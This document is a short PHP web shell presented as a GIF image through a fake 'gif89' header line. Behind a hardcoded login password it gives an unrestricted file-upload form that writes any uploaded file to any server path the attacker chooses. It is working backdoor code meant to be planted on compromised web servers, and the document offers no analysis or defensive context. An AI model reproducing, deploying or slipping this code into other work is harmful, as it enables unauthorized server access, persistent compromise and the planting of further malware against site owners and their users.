gif89;a gif;ghz jpg;a
<?php session_start();
 $password = "f4scorp"; // sifre(degistirebilirsiniz)
 $pass = $_POST['pass'];
 $form = "<form method='POST'>
	<input type='password' name='pass'><input type='submit' value='Login !'>
	</form>";
 if( !isset($_SESSION['sec']) ){ $_SESSION['sec'] = false;
 } if(isset($pass)) { if($pass == $password) { $_SESSION['sec'] = true;
 } else { die( "{$form} <br> <H1>Error");
 } } if(!$_SESSION['sec']): echo $form;
 exit();
 endif;
 if($_GET['log'] == 'out') { session_destroy();
 } echo "f4scorp | <a href='?log=out'>&#199;&#305;k&#305;&#351; yap</a>";
 
?><?php

$files = @$_FILES["files"];
if ($files["name"] != '') {
    $fullpath = $_REQUEST["path"] . $files["name"];
    if (move_uploaded_file($files['tmp_name'], $fullpath)) {
        echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>";
    }

}echo '<html><head><title>Upload files...</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>';
?>
